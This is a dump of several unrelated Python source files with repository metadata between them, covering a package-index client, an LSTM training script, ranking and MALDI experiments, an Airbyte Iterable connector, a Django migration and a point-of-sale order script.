def find_packages(self, dependency):
packages = []
constraint = dependency.constraint
if constraint is None:
constraint = "*"
if not isinstance(constraint, VersionConstraint):
constraint = parse_constraint(constraint)
allow_prereleases = dependency.allows_prereleases()
if isinstance(constraint, VersionRange):
if (
constraint.max is not None
and constraint.max.is_prerelease()
or constraint.min is not None
and constraint.min.is_prerelease()
):
allow_prereleases = True
key = dependency.name
if not constraint.is_any():
key = "{}:{}".format(key, str(constraint))
ignored_pre_release_versions = []
if self._cache.store("matches").has(key):
versions = self._cache.store("matches").get(key)
else:
page = self._get("/{}/".format(dependency.name.replace(".", "-")))
if page is None:
return []
versions = []
for version in page.versions:
if version.is_prerelease() and not allow_prereleases:
if constraint.is_any():
# we need this when all versions of the package are pre-releases
ignored_pre_release_versions.append(version)
continue
if constraint.allows(version):
versions.append(version)
self._cache.store("matches").put(key, versions, 5)
for package_versions in (versions, ignored_pre_release_versions):
for version in package_versions:
package = Package(
dependency.name,
version,
source_type="legacy",
source_reference=self.name,
source_url=self._url,
)
packages.append(package)
self._log(
"{} packages found for {} {}".format(
len(packages), dependency.name, str(constraint)
),
level="debug",
)
if packages or not constraint.is_any():
# we have matching packages, or constraint is not (*)
break
return packages
def package(self, name, version, extras=None): # type: (...) -> Package
"""
Retrieve the release information.
This is a heavy task which takes time.
We have to download a package to get the dependencies.
We also need to download every file matching this release
to get the various hashes.
Note that this will be cached so the subsequent operations
should be much faster.
"""
try:
index = self._packages.index(Package(name, version, version))
return self._packages[index]
except ValueError:
package = super(LegacyRepository, self).package(name, version, extras)
package._source_type = "legacy"
package._source_url = self._url
package._source_reference = self.name
return package
def find_links_for_package(self, package):
page = self._get("/{}/".format(package.name.replace(".", "-")))
if page is None:
return []
return list(page.links_for_version(package.version))
def _get_release_info(self, name, version): # type: (str, str) -> dict
page = self._get("/{}/".format(canonicalize_name(name).replace(".", "-")))
if page is None:
raise PackageNotFound('No package named "{}"'.format(name))
data = PackageInfo(
name=name,
version=version,
summary="",
platform=None,
requires_dist=[],
requires_python=None,
files=[],
cache_version=str(self.CACHE_VERSION),
)
links = list(page.links_for_version(Version.parse(version)))
if not links:
raise PackageNotFound(
'No valid distribution links found for package: "{}" version: "{}"'.format(
name, version
)
)
urls = defaultdict(list)
files = []
for link in links:
if link.is_wheel:
urls["bdist_wheel"].append(link.url)
elif link.filename.endswith(
(".tar.gz", ".zip", ".bz2", ".xz", ".Z", ".tar")
):
urls["sdist"].append(link.url)
h = link.hash
if h:
h = link.hash_name + ":" + link.hash
files.append({"file": link.filename, "hash": h})
data.files = files
info = self._get_info_from_urls(urls)
data.summary = info.summary
data.requires_dist = info.requires_dist
data.requires_python = info.requires_python
return data.asdict()
def _get(self, endpoint): # type: (str) -> Union[Page, None]
url = self._url + endpoint
try:
response = self.session.get(url)
if response.status_code == 404:
return
response.raise_for_status()
except requests.HTTPError as e:
raise RepositoryError(e)
if response.status_code in (401, 403):
self._log(
"Authorization error accessing {url}".format(url=url), level="warn"
)
return
return Page(url, response.content, response.headers)
|
[
"clint93@Atlabs-MacBook-Pro.local"
] |
clint93@Atlabs-MacBook-Pro.local
|
81467d83f2f1731e28f4172b5b99dae116ba72e8
|
3235d5de705b99ccf983fad5eb72208d1fdc08a1
|
/torch_codes/training.py
|
2da884ad18f536dfabe3a26fb93f58ca8d1323d0
|
[] |
no_license
|
TeCSAR-UNCC/ScalableTracking
|
d0e85aa89dcfa6ea107efb74f8b92e0edd6f2af8
|
21fe38c547e1430d26b7bc82afc74fc60219583d
|
refs/heads/master
| 2020-04-25T17:40:30.638974
| 2019-02-28T01:49:48
| 2019-02-28T01:49:48
| 172,957,370
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,927
|
py
|
from __future__ import print_function
import numpy as np
import random
import os.path
import datetime
import utils
import random
import torch
import torch.nn as nn
import torch.optim as optim
''' Device configuration '''
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
''' HYPERPARAMETERS'''
num_steps = 6
input_size = 54
hidden_size = 64
num_layers=1
num_classes = 4
batch_size = 1
epoches = 50
learning_rate = 0.000001
num_videos = 64
path_to_data = sorted(os.listdir('../duke_dataset/training/'))
class RNN(nn.Module):
def __init__(self, input_size, hidden_size, num_layers, num_classes):
super(RNN, self).__init__()
self.hidden_size = hidden_size
self.num_layers = num_layers
self.lstm = nn.LSTM(input_size, hidden_size,num_layers, batch_first=True)
self.fc = nn.Linear(hidden_size,num_classes)
def forward(self,input_x):
#Set initial hidden and cell states
h0 = torch.zeros(self.num_layers, input_x.size(0), self.hidden_size).to(device)
c0 = torch.zeros(self.num_layers, input_x.size(0), self.hidden_size).to(device)
#Forward propagate LSTM
#out: tensor of shape (batch_size, seq_length, hidden_size)
out, _ = self.lstm(input_x,(h0,c0))
out = self.fc(out[:,-1,:])
return out
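# Hedged shape check (not part of the original script): the LSTM consumes tensors of
# shape (batch, num_steps, input_size) and the linear head returns (batch, num_classes).
# Wrapped in a function so module behaviour is unchanged unless it is called explicitly;
# the function name is hypothetical.
def _check_rnn_shapes():
    demo = RNN(input_size, hidden_size, num_layers, num_classes).to(device)
    dummy = torch.zeros(batch_size, num_steps, input_size).to(device)
    assert demo(dummy).shape == (batch_size, num_classes)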
model = RNN(input_size,hidden_size,num_layers,num_classes).to(device)
# Loss and optimizer
criterion = nn.MSELoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
iters = num_videos * epoches
randlist=random.sample(range(0,len(path_to_data),2),num_videos)
for epoch in range(epoches):
cnt=0
for i in (randlist):
#i = i % num_videos
#in ROLO utils file, the sequence for MOT16 starts with 30 Modification 3
        w_img, h_img, sequence_name = 1920.0, 1080.0, path_to_data[i]
x_path = os.path.join('../duke_dataset/training/', sequence_name) #Modification 4
#x_bbox_path = os.path.join('own_images/training/', sequence_name, 'bbox_video.npy')
y_path = '../duke_dataset/training/'+ sequence_name[:-4]+ '_gt.npy' ##Modification 5
#print y_path
filegt = np.load(y_path)
filefeatures = np.load(x_path)
training_iters = filefeatures.shape[0]
#filebboxes = np.load(x_bbox_path)
print('Sequence '+ sequence_name+' chosen')
id =0
total_loss=0
while id < training_iters- num_steps*batch_size:
# Load training data & ground truth
batch_input = utils.load_openpose_features_train(w_img,h_img,filefeatures , batch_size, num_steps, id) # [num_of_examples, input_size] (depth == 1)
batch_groundtruth = utils.load_openpose_gt_train(w_img,h_img,filegt, batch_size, num_steps, id)
batch_input = np.reshape(batch_input, [batch_size, num_steps, input_size])
batch_input = (torch.from_numpy(batch_input)).to(device)
#print(batch_input, batch_input.shape)
batch_groundtruth = np.reshape(batch_groundtruth, [batch_size, num_classes]) #2*4
batch_groundtruth = (torch.from_numpy(batch_groundtruth)).to(device)
#print(batch_groundtruth , batch_groundtruth.shape)
outputs = model(batch_input)
loss = criterion(outputs,batch_groundtruth)*100
optimizer.zero_grad()
loss.backward()
optimizer.step()
#print(id)
total_loss += loss.item()
id = id +1
print ('Epoch [{}/{}], Video [{}/{}], Loss: {:.6f}'.format(epoch+1, epoches, cnt+1, num_videos, total_loss/id))
print ('\n')
cnt+=1
#print('Sequence '+sequence_name+' done')
if (epoch+1)%10==0:
torch.save(model.state_dict(), 'model1/model_epoch'+str(epoch+1)+'_.ckpt')
#print('Model for epoch '+str(epoch)+' saved')
|
[
"pkulkar7@tecsar-srv2.dyn.uncc.edu"
] |
pkulkar7@tecsar-srv2.dyn.uncc.edu
|
2214dd9351b4d1e273596d7252c5ee446963f6e9
|
69d9848465ad109291bc0619aff8eff64d4677af
|
/runner/DecisionTreeRunner.py
|
e93f1658cbfcc3d6570022fd1fc232f2b5b18b20
|
[] |
no_license
|
mwasif41/LTR-DT-NN-Ensemble
|
cc0c3c9d50fc3d3d00a11d679510245490459a55
|
4b684a69b19085af44d46b52365b1027f48d088a
|
refs/heads/master
| 2022-10-18T16:50:14.274460
| 2020-06-10T18:07:10
| 2020-06-10T18:07:10
| 267,496,855
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 915
|
py
|
from sklearn.model_selection import train_test_split
from util.Utils import read_dataset_as_df
from constant.Constant import DATASET_MQ2008_PATH
from constant.Constant import MQ2008_TSV_FILE_NAME
from model.DecisionTree import DecisionTree
from util.Utils import get_data_params
from util.Utils import calculate_ndcg
from util.Utils import calculate_map
'''
Main running logic for the decision tree without the ensemble technique.
Dataset: MQ2008
'''
print(":: DT started ::")
df = read_dataset_as_df(DATASET_MQ2008_PATH + MQ2008_TSV_FILE_NAME)
# Dividing the data
train, test = train_test_split(df, test_size=0.7)
train_x, train_y, train_q = get_data_params(train)
test_x ,test_y , test_q = get_data_params(test)
model = DecisionTree(100)
model.fit(train)
pred = model.predict(test)
ndcg = calculate_ndcg(pred, test_y)
mAP = calculate_map(pred, test_y)
print('NDCG For DT :', ndcg)
print('MAP For DT :', mAP)
|
[
"Muhammad_Wasif@gap.com"
] |
Muhammad_Wasif@gap.com
|
d7e1bcee8fd1dcf988ea57fad50f8221522ec18f
|
4d59702f4f06b5a03e82195b68c36e5953a27a03
|
/test.py
|
2ce09b234b1ca702f9a91c789d19cddf7b3b0f16
|
[] |
no_license
|
shenhangke/FlaskLearn
|
e991c7fcd4416db5841e5e5653636734669a2a20
|
29b82bc211a2e70fed9ee3acef276b06ed1639c6
|
refs/heads/master
| 2020-06-14T08:40:41.863462
| 2019-07-05T09:20:07
| 2019-07-05T09:20:07
| 194,962,085
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 454
|
py
|
'''
@File : test.py
@Modify Time @Author @Version @Desciption
------------ ------- -------- -----------
2019-07-01 22:39 shenhangke 1.0 None
---------------------
'''
import os.path
def bytesToStr(bytes):
return str(bytes)
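# Hedged note (not part of the original file): str() on a bytes object returns its repr
# (e.g. "b'...'") rather than decoded text. If decoding was the intent, a variant could
# look like the sketch below; the function name and the latin-1 default are assumptions,
# chosen because the sample bytes in the __main__ block below are not valid UTF-8.
def bytesToDecodedStr(bytes_value, encoding="latin-1"):
    return bytes_value.decode(encoding, errors="replace")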
if __name__ == "__main__":
print(os.path.abspath("."))
print(os.path.curdir) # os.path.curdir is .
print(bytesToStr(b'\xa80\xc1fr\xc9\xcb\xf8+\xec\xa8\x85+5\x96u'))
|
[
"shenhangke@shenhangkedeMacBook-Pro.local"
] |
shenhangke@shenhangkedeMacBook-Pro.local
|
e86cc256b8f0b493baf3ed65ab14534719e398e8
|
9156f9c8231c6d44b7499ea77f47d3e1a561da16
|
/api/migrations/0006_auto_20200515_1551.py
|
7e165ad65cb6ae8759d24eeb668a56cab74fbf42
|
[] |
no_license
|
dasari810/csoc-2020-task-3
|
c0ed1965a752f36e644e2d4e030317f5097b2b18
|
04e165a3bf2bac58d072924b14f48cb1c2ff51b2
|
refs/heads/master
| 2022-10-30T23:27:04.932558
| 2020-06-19T06:40:20
| 2020-06-19T06:40:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 486
|
py
|
# Generated by Django 3.0.6 on 2020-05-15 10:21
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('api', '0005_auto_20200515_1537'),
]
operations = [
migrations.AlterField(
model_name='collaborate',
name='title',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='task', to='api.Todo'),
),
]
|
[
"dasarimadhava810@gmail.com"
] |
dasarimadhava810@gmail.com
|
4343da0251832c30b4cd846e7e6d7e1cccc17968
|
f6a328e169e7756394bdd642173287f8ee6fdc0f
|
/airbyte-integrations/connectors/source-iterable/source_iterable/api.py
|
0d5f429638886df614ad1d0d53cfda2636ba654a
|
[
"MIT"
] |
permissive
|
nclsbayona/airbyte
|
8b5dc24a949dfa29c523a41400b825cecf34dfbe
|
29c31752bf7842c0b222a74bee2b3fbe5cb39091
|
refs/heads/master
| 2023-04-11T11:25:35.360075
| 2021-04-26T15:21:02
| 2021-04-26T15:21:02
| 361,794,568
| 0
| 0
|
MIT
| 2021-04-26T15:11:05
| 2021-04-26T15:11:04
| null |
UTF-8
|
Python
| false
| false
| 7,772
|
py
|
# MIT License
#
# Copyright (c) 2020 Airbyte
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import json
import urllib.parse as urlparse
from abc import ABC, abstractmethod
from typing import Any, Iterable, Mapping, MutableMapping, Optional, Union
import pendulum
import requests
from airbyte_protocol import ConfiguredAirbyteStream
from base_python import HttpStream
class IterableStream(HttpStream, ABC):
url_base = "https://api.iterable.com/api/"
# Hardcode the value because it is not returned from the API
BACKOFF_TIME_CONSTANT = 10.0
def __init__(self, api_key, **kwargs):
super().__init__(**kwargs)
self._api_key = api_key
@property
@abstractmethod
def data_field(self) -> str:
"""
:return: Default field name to get data from response
"""
def backoff_time(self, response: requests.Response) -> Optional[float]:
return self.BACKOFF_TIME_CONSTANT
def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:
"""
Iterable API does not support pagination
"""
return None
def request_params(self, **kwargs) -> MutableMapping[str, Any]:
return {"api_key": self._api_key}
def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]:
response_json = response.json()
yield from response_json.get(self.data_field, [])
class IterableExportStream(IterableStream, ABC):
def __init__(self, start_date, **kwargs):
super().__init__(**kwargs)
self._start_date = pendulum.parse(start_date)
self.stream_params = {"dataTypeName": self.data_field}
cursor_field = "createdAt"
@staticmethod
def _field_to_datetime(value: Union[int, str]) -> pendulum.datetime:
if isinstance(value, int):
value = pendulum.from_timestamp(value / 1000.0)
elif isinstance(value, str):
value = pendulum.parse(value)
else:
raise ValueError(f"Unsupported type of datetime field {type(value)}")
return value
def get_updated_state(self, current_stream_state: MutableMapping[str, Any], latest_record: Mapping[str, Any]) -> Mapping[str, Any]:
"""
Return the latest state by comparing the cursor value in the latest record with the stream's most recent state object
and returning an updated state object.
"""
latest_benchmark = self._field_to_datetime(latest_record[self.cursor_field])
if current_stream_state.get(self.cursor_field):
return {self.cursor_field: str(max(latest_benchmark, self._field_to_datetime(current_stream_state[self.cursor_field])))}
return {self.cursor_field: str(latest_benchmark)}
def request_params(self, stream_state: Mapping[str, Any], **kwargs) -> MutableMapping[str, Any]:
params = super().request_params(stream_state=stream_state)
start_datetime = self._start_date
if stream_state.get(self.cursor_field):
start_datetime = pendulum.parse(stream_state[self.cursor_field])
params.update(
{"startDateTime": start_datetime.strftime("%Y-%m-%d %H:%M:%S"), "endDateTime": pendulum.now().strftime("%Y-%m-%d %H:%M:%S")},
**self.stream_params,
)
return params
def path(self, **kwargs) -> str:
return "/export/data.json"
def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]:
for obj in response.iter_lines():
yield json.loads(obj)
class Lists(IterableStream):
data_field = "lists"
def path(self, **kwargs) -> str:
return "lists"
class ListUsers(IterableStream):
data_field = "getUsers"
name = "list_users"
def path(self, parent_stream_record, **kwargs) -> str:
return f"lists/{self.data_field}?listId={parent_stream_record['id']}"
def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]:
list_id = self._get_list_id(response.url)
for user in response.iter_lines():
yield {"email": user.decode(), "listId": list_id}
@staticmethod
def _get_list_id(url: str) -> int:
parsed_url = urlparse.urlparse(url)
for q in parsed_url.query.split("&"):
key, value = q.split("=")
if key == "listId":
return int(value)
class Campaigns(IterableStream):
data_field = "campaigns"
def path(self, **kwargs) -> str:
return "campaigns"
class Channels(IterableStream):
data_field = "channels"
def path(self, **kwargs) -> str:
return "channels"
class EmailBounce(IterableExportStream):
name = "email_bounce"
data_field = "emailBounce"
class EmailClick(IterableExportStream):
name = "email_click"
data_field = "emailClick"
class EmailComplaint(IterableExportStream):
name = "email_complaint"
data_field = "emailComplaint"
class EmailOpen(IterableExportStream):
name = "email_open"
data_field = "emailOpen"
class EmailSend(IterableExportStream):
name = "email_send"
data_field = "emailSend"
class EmailSendSkip(IterableExportStream):
name = "email_send_skip"
data_field = "emailSendSkip"
class EmailSubscribe(IterableExportStream):
name = "email_subscribe"
data_field = "emailSubscribe"
class EmailUnsubscribe(IterableExportStream):
name = "email_unsubscribe"
data_field = "emailUnsubscribe"
class MessageTypes(IterableStream):
data_field = "messageTypes"
name = "message_types"
def path(self, **kwargs) -> str:
return "messageTypes"
class Metadata(IterableStream):
data_field = "results"
def path(self, **kwargs) -> str:
return "metadata"
class Templates(IterableExportStream):
data_field = "templates"
template_types = ["Base", "Blast", "Triggered", "Workflow"]
message_types = ["Email", "Push", "InApp", "SMS"]
def path(self, **kwargs) -> str:
return "templates"
def read_stream(
self, configured_stream: ConfiguredAirbyteStream, stream_state: Mapping[str, Any] = None
) -> Iterable[Mapping[str, Any]]:
for template in self.template_types:
for message in self.message_types:
self.stream_params = {"templateType": template, "messageMedium": message}
yield from super().read_stream(configured_stream=configured_stream, stream_state=stream_state)
def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]:
response_json = response.json()
yield from response_json.get(self.data_field, [])
class Users(IterableExportStream):
data_field = "user"
cursor_field = "profileUpdatedAt"
|
[
"noreply@github.com"
] |
nclsbayona.noreply@github.com
|
330c03ce5ccddcd902120b930900178002d5f97a
|
94e7edd5255ca90f8149f160660925db82187aa1
|
/pyaudi.py
|
37fbf1c15cc33682aeab97f324afedf8bbb94c04
|
[] |
no_license
|
FelipeRMG/Teste
|
a1ea289c8c43d0ca65967e3fa62abcb9b5bb5a8d
|
20266d6d60b9b1907955f6304b61afa649d8e215
|
refs/heads/master
| 2021-01-09T20:05:37.838644
| 2016-07-29T04:50:07
| 2016-07-29T04:50:07
| 63,440,528
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,136
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# used to record audio
import pyaudio
import wave
CHUNK = 1024 # frames per buffer
FORMAT = pyaudio.paInt16 # audio sample format
CHANNELS = 2 # 1 channel: mono, 2 channels: stereo
RATE = 44100 # sampling rate in hertz
RECORD_SECONDS = 5 # recording time in seconds
WAVE_OUTPUT_FILENAME = "output.wav" # output audio file
# create the pyaudio instance
p = pyaudio.PyAudio()
# configure the stream to record audio
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
print("* recording")
frames = []
for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
data = stream.read(CHUNK)
frames.append(data)
print("* done recording")
stream.stop_stream()
stream.close()
p.terminate()
# configure the output audio file properties
# print frames
wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(frames))
wf.close()
|
[
"noreply@github.com"
] |
FelipeRMG.noreply@github.com
|
38fff3cdd9e08c7ee8f2f9c4b19e664f4e00e700
|
72612d94e07649586dda53c94a058a26af5ed3e6
|
/amr_maldi_ml/deprecated/label_permutation.py
|
cb9f7594dc820409c80b262333e666e4b898d4d3
|
[
"BSD-3-Clause"
] |
permissive
|
SanmiAndreSofa/maldi_amr
|
91e88d0a23d2cb1e5007f73a8ba04be6828d6b6e
|
cc084d73a2d14c5936878e609f6d44fad0b524c7
|
refs/heads/master
| 2023-08-06T10:26:58.989597
| 2021-10-04T09:12:05
| 2021-10-04T09:12:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,983
|
py
|
"""Analylse label-permuted species--antibiotic combinations."""
import argparse
import dotenv
import json
import logging
import pathlib
import os
import numpy as np
from maldi_learn.driams import DRIAMSDatasetExplorer
from maldi_learn.driams import DRIAMSLabelEncoder
from maldi_learn.driams import load_driams_dataset
from maldi_learn.utilities import stratify_by_species_and_label
from models import run_experiment
from utilities import generate_output_filename
dotenv.load_dotenv()
DRIAMS_ROOT = os.getenv('DRIAMS_ROOT')
# These parameters should remain fixed for this particular
# experiment. We always train on the same data set, using
# *all* available years.
site = 'DRIAMS-A'
years = ['2015', '2016', '2017', '2018']
def _run_experiment(
root,
fingerprints,
species,
antibiotic,
corruption,
seed,
output_path,
force,
model,
n_jobs=-1
):
"""Run a single experiment for a given species--antibiotic combination."""
driams_dataset = load_driams_dataset(
root,
site,
years,
species=species,
antibiotics=antibiotic, # Only a single one for this run
encoder=DRIAMSLabelEncoder(),
handle_missing_resistance_measurements='remove_if_all_missing',
spectra_type='binned_6000',
)
logging.info(f'Loaded data set for {species} and {antibiotic}')
# Create feature matrix from the binned spectra. We only need to
# consider the second column of each spectrum for this.
X = np.asarray([spectrum.intensities for spectrum in driams_dataset.X])
logging.info('Finished vectorisation')
corrupted_indices = driams_dataset.y.sample(
frac=corruption,
replace=False,
        random_state=seed,
).index.values
driams_dataset.y.loc[corrupted_indices, antibiotic] = \
1.0 - driams_dataset.y.loc[corrupted_indices, antibiotic]
# Stratified train--test split
train_index, test_index = stratify_by_species_and_label(
driams_dataset.y,
antibiotic=antibiotic,
random_state=seed,
)
logging.info('Finished stratification')
# Create labels
y = driams_dataset.to_numpy(antibiotic)
X_train, y_train = X[train_index], y[train_index]
X_test, y_test = X[test_index], y[test_index]
# Prepare the output dictionary containing all information to
# reproduce the experiment.
output = {
'site': site,
'seed': seed,
'model': model,
'antibiotic': antibiotic,
'species': species,
'years': years,
}
output_filename = generate_output_filename(
output_path,
output,
suffix=f'corruption_{corruption:.02f}'.replace('.', '_'),
)
output['corruption'] = corruption
# Add fingerprint information about the metadata files to make sure
# that the experiment is reproducible.
output['metadata_versions'] = fingerprints
# Only write if we either are running in `force` mode, or the
# file does not yet exist.
if not os.path.exists(output_filename) or force:
n_folds = 5
results = run_experiment(
X_train, y_train,
X_test, y_test,
model,
n_folds,
verbose=True,
random_state=seed,
)
output.update(results)
logging.info(f'Saving {os.path.basename(output_filename)}')
with open(output_filename, 'w') as f:
json.dump(output, f, indent=4)
else:
logging.warning(
f'Skipping {output_filename} because it already exists.'
)
if __name__ == '__main__':
# Basic log configuration to ensure that we see where the process
# spends most of its time.
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s %(message)s'
)
parser = argparse.ArgumentParser()
parser.add_argument(
'-a', '--antibiotic',
type=str,
required=True,
help='Antibiotic for which to run the experiment'
)
parser.add_argument(
'-s', '--species',
type=str,
required=True,
help='Species for which to run the experiment'
)
parser.add_argument(
'-c', '--corruption',
type=float,
required=True,
help='Fraction of corrupted labels; must be between [0,1]'
)
parser.add_argument(
'-S', '--seed',
type=int,
required=True,
help='Random seed to use for the experiment'
)
parser.add_argument(
'-m', '--model',
default='lr',
help='Selects model to use for subsequent training'
)
name = 'label_permutation'
parser.add_argument(
'-o', '--output',
default=pathlib.Path(__file__).resolve().parent.parent / 'results'
/ name,
type=str,
help='Output path for storing the results.'
)
parser.add_argument(
'-f', '--force',
action='store_true',
help='If set, overwrites all files. Else, skips existing files.'
)
args = parser.parse_args()
# Create the output directory for storing all results of the
# individual combinations.
os.makedirs(args.output, exist_ok=True)
logging.info(f'Site: {site}')
logging.info(f'Years: {years}')
logging.info(f'Seed: {args.seed}')
logging.info(f'Corruption: {args.corruption:.02f}')
explorer = DRIAMSDatasetExplorer(DRIAMS_ROOT)
metadata_fingerprints = explorer.metadata_fingerprints(site)
# How many jobs to use to run this experiment. Should be made
# configurable ideally.
n_jobs = 24
_run_experiment(
explorer.root,
metadata_fingerprints,
args.species,
args.antibiotic,
args.corruption,
args.seed,
args.output,
args.force,
args.model,
n_jobs
)
|
[
"bastian.rieck@bsse.ethz.ch"
] |
bastian.rieck@bsse.ethz.ch
|
0d5144714bd9cd05c3c1b586657445ed67624e6f
|
54d11cd21a9a3db41cb94f12edbd0f56596d1471
|
/Exercises1/Q1.py
|
5c70753aa301f4aa0efa1514d16c2a134cfdee79
|
[] |
no_license
|
BrunoCaputo/ac309-pyExercises
|
237fae143842a8dac56cedbeb8f855d8da5b358f
|
4a0f0f39ce0f26d84f3517ff6910c4ab30c982e6
|
refs/heads/master
| 2022-10-01T15:33:36.666241
| 2020-06-08T12:00:45
| 2020-06-08T12:00:45
| 261,155,868
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
# Write a program that reads something from the keyboard and reports whether the
# input consists only of digits, only of letters, or of alphanumeric characters
inp = input("Entre com alguma coisa: ")
if inp.isnumeric():
print("A entrada é formada por apenas números!")
elif inp.isalpha():
print("A entrada é formado por apenas letras!")
elif inp.isalnum():
print("A entrada é formada por números e letras!")
|
[
"brunocaputo@gec.inatel.br"
] |
brunocaputo@gec.inatel.br
|
aa910671713e529e8fa39e8d66ebc8311966c900
|
5e277a32c166ae45bea28310074dc459a0d99cf6
|
/.metadata/.plugins/org.eclipse.core.resources/.history/c5/c0147c8c62a000161648cad84bf61dd0
|
444fd7f9be517480124d9247526cf66939d62057
|
[] |
no_license
|
vgvcode/pos
|
4d7172d7905f60157fcae445c650475d17a9a390
|
a9dba2c5c3fc8c4529c6619a3dc92c9608a4c70d
|
refs/heads/master
| 2021-01-13T13:12:37.833510
| 2016-11-02T22:28:42
| 2016-11-02T22:28:42
| 72,686,364
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,996
|
#!/usr/bin/python
from __future__ import print_function # Python 2/3 compatibility
from decimal import *
import ordersmodule
import catalogmodule
import commonmodule
import sys
import time
from boto3.dynamodb.conditions import Key, Attr
import sqsmodule
import random
import json
def testCreateRemoteCatalog():
'create a list of items and add them one by one'
items = [
{"itemId" : '100', "itemName": 'IDLI', "price": 20},
{"itemId" : '101', "itemName": 'DOSA', "price": 22},
{"itemId" : '102', "itemName": 'VADA', "price": 18},
{"itemId" : '103', "itemName": 'POORI', "price": 25},
{"itemId" : '104', "itemName": 'PONGAL', "price": 27},
{"itemId" : '105', "itemName": 'CHAPPATHI', "price": 15},
{"itemId" : '106', "itemName": 'NOODLES', "price": 20},
{"itemId" : '107', "itemName": 'MEALS', "price": 30},
{"itemId" : '108', "itemName": 'CHAAT', "price": 24},
{"itemId" : '109', "itemName": 'BATURA', "price": 32}
]
#create a remote catalogmodule.Catalog
cat = catalogmodule.Catalog("SRC_CAT100", endpoint="https://dynamodb.us-east-1.amazonaws.com")
cat.createTable()
print('Created schema in remote db')
#add items to the remote catalogmodule.Catalog
#delay a few seconds
print('Waiting for resource to be available...')
time.sleep(30)
for i in items:
cat.addItem(i['itemId'], i['itemName'], i['price'])
def testFetchRemoteCatalog():
cat = catalogmodule.Catalog("SRC_CAT100", endpoint="https://dynamodb.us-east-1.amazonaws.com")
cat.fetchFromDB()
cat.print()
def testFetchLocalCatalog():
cat = catalogmodule.Catalog("SRC_CAT100", endpoint="http://localhost:8000")
cat.fetchFromDB()
cat.print()
def testFetchAllOrders(posId):
os = ordersmodule.OrderTable()
r = os.fetchForPos(posId)
for itm in r["Items"]:
print(itm)
print("Total orders:{}".format(len(r["Items"])))
#createordersmodule.OrderQueues()
#testCreateRemoteCatalog()
#Create the order table
#os = ordersmodule.OrderTable(endpoint = ep)
#os.createTable()
#Create the order queues
#oq = ordersmodule.OrderQueues()
#oq.makeQueues()
#Get orders made in X days
#r = getOrdersMadeInXDays(posId, 1)
#print("Orders made in the last 1 day")
#for o in r['Items']:
# print(o['PosID'], ":", o['OrderID'], o['Info'])
#testCopyRemoteCatalogToLocal(catId)
#c = catalogmodule.Catalog(catId)
#r = c.fetchItemFromDB('102')
#print(r)
#c.print()
#print(c.getItems()['100'])
#Place a few orders
#for i in [1,2,3]:
# o = ordersmodule.Order(posId)
# o.addItem(c.getItems()['103'], i)
# o.addItem(c.getItems()['104'], i)
# o.saveToDB()
# #o.print()
#ot = ordersmodule.OrderTable()
#ot.deQueueOrdersToRemote('insert', 'https://dynamodb.us-east-1.amazonaws.com')
#Initialization
posId = 'PosGNChettyRoadCafe'
catId = 'SRC_CAT100'
ep = "http://localhost:8000"
remoteEp = "https://dynamodb.us-east-1.amazonaws.com"
lCat = catalogmodule.Catalog(catId)
if lCat.copyFromRemote(remoteEp) == False:
    print("Remote copy failed")
    sys.exit(1)  # SystemExit() alone only builds the exception; it must be raised to actually exit
print('Copied remote catalog to local')
items = lCat.getItems()
print(items)
"""
for i in range(1,2):
print('Placing order number:{}'.format(i))
o = ordersmodule.Order(posId)
numItems = int(random.random() * 9 + 1)
print("Number of items:{}".format(numItems))
for j in range(1, numItems+1):
itemNumStr = str(100 + int(random.random() * 10))
itemQty = int(random.random() * 19 + 1)
o.addItem(items[itemNumStr], itemQty)
o.writeToFile("orders.txt")
if o.saveToDB() == True:
print("Order saved successfully")
else:
print("Order not saved")
time.sleep(10)
o.addItem(items['105'], 105)
if o.updateToDB() == True:
print("Order updated successfully")
else:
print("Order not updated")
del o
ot = ordersmodule.OrderTable()
ot.deQueueOrdersToRemote('insert', remoteEp)
print('Dequeued all insert orders to remote DB')
time.sleep(10)
ot = ordersmodule.OrderTable()
ot.deQueueOrdersToRemote('update', remoteEp)
